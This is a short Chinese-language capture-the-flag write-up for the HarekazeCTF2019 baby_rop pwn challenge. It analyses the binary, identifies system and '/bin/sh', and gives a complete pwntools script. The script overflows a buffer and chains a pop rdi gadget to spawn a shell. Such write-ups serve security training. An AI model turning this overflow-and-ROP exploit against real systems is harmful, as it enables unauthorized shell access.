BUUCTF pwn [HarekazeCTF2019]baby_rop

0x01 文件分析

BUUCTF pwn [HarekazeCTF2019]baby_rop_第1张图片

0x02 运行

在这里插入图片描述
 一组回显

0x03 IDA

BUUCTF pwn [HarekazeCTF2019]baby_rop_第2张图片
在这里插入图片描述
 程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。

0x04 思路

 简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag查找位置。

0x05 exp

from pwn import *

p = process("./babyrop")
#p = remote('node3.buuoj.cn', 27401)


sys_addr = 0x0000000000400490
bin_sh = 0x0000000000601048
pop_rdi = 0x0000000000400683

p.recvuntil('? ')
p.sendline('a'*0x18+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr))

p.interactive()

一个简单的网络安全公众号,欢迎各位朋友们关注!

在这里插入图片描述

你可能感兴趣的:(ctf_pwn)